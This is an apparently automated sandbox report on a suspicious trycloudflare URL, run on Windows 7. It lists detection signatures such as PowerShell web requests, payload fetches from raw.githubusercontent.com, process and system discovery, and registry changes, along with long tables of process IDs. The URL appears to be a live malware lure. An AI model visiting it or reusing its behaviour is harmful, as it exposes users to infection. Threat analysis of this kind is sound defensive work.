hxxps://ni-olympic-forests-invoice[.]trycloudflare[.]com

Resubmissions

18-11-2024 23:43

241118-3qqanaspdj 8

18-11-2024 23:08

241118-243bpsxbpa 10

Analysis

max time kernel
558s
max time network
1685s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
18-11-2024 23:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://ni-olympic-forests-invoice.trycloudflare.com

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 32 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1868	powershell.exe
2228	powershell.exe
3008	powershell.exe
2728	powershell.exe
2524	powershell.exe
1040	powershell.exe
1716	powershell.exe
896	powershell.exe
896	powershell.exe
1612	powershell.exe
2176	powershell.exe
2992	powershell.exe
2080	powershell.exe
1788	powershell.exe
896	powershell.exe
1080	powershell.exe
2636	powershell.exe
328	powershell.exe
2124	powershell.exe
2516	powershell.exe
2020	powershell.exe
1000	powershell.exe
2184	powershell.exe
1856	powershell.exe
2392	powershell.exe
2708	powershell.exe
3036	powershell.exe
3008	powershell.exe
2528	powershell.exe
1008	powershell.exe
3044	powershell.exe
2348	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
173	raw.githubusercontent.com
177	raw.githubusercontent.com
151	raw.githubusercontent.com
152	raw.githubusercontent.com
153	raw.githubusercontent.com
172	raw.githubusercontent.com
174	raw.githubusercontent.com
176	raw.githubusercontent.com
178	raw.githubusercontent.com

Enumerates processes with tasklist 1 TTPs 8 IoCs

discovery

Process Discovery

T1057

pid	Process
3012	tasklist.exe
1100	tasklist.exe
2980	tasklist.exe
2612	tasklist.exe
2748	tasklist.exe
2172	tasklist.exe
1540	tasklist.exe
2880	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\SearchScopes\UpgradeTime = a05a195c143adb01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{6EEC42F1-A607-11EF-ABB3-E67A421F41DB} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7805AB11-A607-11EF-ABB3-E67A421F41DB} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingDelete	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe

Modifies registry class 31 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Local Settings	notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}"	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1092616257"	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\IconSize = "16"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}"	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Mode = "4"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1"	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\LogicalViewMode = "1"	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Sort = 000000000000000000000000000000000200000030f125b7ef471a10a5f102608c9eebac0a0000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	notepad.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
1992	chrome.exe
1992	chrome.exe
2992	powershell.exe
1992	chrome.exe
1992	chrome.exe
3044	powershell.exe
2708	powershell.exe
2516	powershell.exe
3036	powershell.exe
896	powershell.exe
1868	powershell.exe
2080	powershell.exe
896	powershell.exe
1040	powershell.exe
2348	powershell.exe
1080	powershell.exe
2728	powershell.exe
2636	powershell.exe
2020	powershell.exe
1000	powershell.exe
1612	powershell.exe
2184	powershell.exe
1856	powershell.exe
328	powershell.exe
2524	powershell.exe
2392	powershell.exe
2228	powershell.exe
1716	powershell.exe
3008	powershell.exe
1788	powershell.exe
2176	powershell.exe
2528	powershell.exe
3008	powershell.exe
1008	powershell.exe
896	powershell.exe
2124	powershell.exe
2696	iexplore.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe
Token: SeShutdownPrivilege	1992	chrome.exe

Suspicious use of FindShellTrayWindow 56 IoCs

pid	Process
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
2156	iexplore.exe
1956	iexplore.exe
2276	iexplore.exe
3060	iexplore.exe
2620	iexplore.exe
2696	iexplore.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe
1992	chrome.exe

Suspicious use of SetWindowsHookEx 37 IoCs

pid	Process
1644	notepad.exe
2156	iexplore.exe
2156	iexplore.exe
1956	iexplore.exe
1956	iexplore.exe
3064	IEXPLORE.EXE
3064	IEXPLORE.EXE
108	IEXPLORE.EXE
108	IEXPLORE.EXE
108	IEXPLORE.EXE
108	IEXPLORE.EXE
3064	IEXPLORE.EXE
3064	IEXPLORE.EXE
2276	iexplore.exe
2276	iexplore.exe
3060	iexplore.exe
3060	iexplore.exe
2568	IEXPLORE.EXE
2568	IEXPLORE.EXE
2532	IEXPLORE.EXE
2532	IEXPLORE.EXE
2620	iexplore.exe
2620	iexplore.exe
2696	iexplore.exe
2696	iexplore.exe
684	IEXPLORE.EXE
684	IEXPLORE.EXE
1000	IEXPLORE.EXE
1000	IEXPLORE.EXE
1000	IEXPLORE.EXE
1000	IEXPLORE.EXE
1628	IEXPLORE.EXE
1628	IEXPLORE.EXE
1080	IEXPLORE.EXE
1080	IEXPLORE.EXE
1628	IEXPLORE.EXE
1628	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1992 wrote to memory of 2064	1992	chrome.exe	30
PID 1992 wrote to memory of 2064	1992	chrome.exe	30
PID 1992 wrote to memory of 2064	1992	chrome.exe	30
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
